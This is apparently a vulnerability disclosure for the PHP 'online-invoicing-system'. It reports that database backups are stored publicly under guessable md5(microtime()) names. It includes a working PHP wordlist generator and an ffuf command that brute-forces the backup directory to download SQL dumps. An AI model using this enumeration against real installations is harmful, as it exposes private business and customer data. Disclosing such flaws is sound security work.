online-invoicing-system

vulnerability insecure storage of backups and weak randomization
severity 5.9
language php
registry other

✍️ Description

The online invoicing system has a backup system to keep backups within a publicly accessible (There is a .htaccess file which forbids access to .sql files but then it is only supported by Apache.) directory and uses MD5 of microtime()as the name of SQL dumps. Unfortunately this is insecure as It is possible to guess the MD5 hashes as microtime() is a time dependent function and can be enumerated.

🕵️‍♂️ Proof of Concept

  • You can find installation instructions here: https://bigprof.com/appgini/applications/online-invoicing-system. This does not works in Apache as there exists a .htaccess file that forbids access to .sql files. So instead of using Apache server, you can utilize any other server including php's inbuilt server

  • As an administrator, create a backup of the database by going to /app/admin/pageBackupRestore.php in the application.

  • Now the backup files are stored in /app/admin/backups/ with the name as [MD5-hash].sql where [MD5-hash] is md5(microtime()). The microtime function returns the current unix timestamp with microseconds separated by space.

  • Wordlist can be generated with the following php script. It accepts two arguments to define the timeframe within which you want to generate wordlist.

<?php

(isset($argv[1]) && isset($argv[2])) or exit(1);

$from = is_numeric($argv[1]) ? (int) $argv[1] : strtotime($argv[1]);

$to = is_numeric($argv[2]) ? (int) $argv[2] : strtotime($argv[2]);

if($from && $to) {
    for($i = $from; $i <= $to; $i++) {
        for($j = 0; $j < 1; $j += 0.00000001) {
            $microseconds = round($j, 8);
            echo md5(sprintf("%'01.8f ", $microseconds).$i)."\n";
        }
    }
} else {
    exit(1);
}
  • Usage of above script is php generateWordlist.php yesterday now > wordlist.txt where "yesterday" is the starting time and "now" is the ending time.

  • After generating the wordlist, now you can fuzz the URL to find the stored databases dumps within the /app/admin/backups directory using any bruteforcer like ffuf:

ffuf -w wordlist.txt -u "http://localhost/app/admin/backups/FUZZ.sql" -mc 200

💥 Impact

Using this method, it is possible to find the SQL database dumps created within the application.

References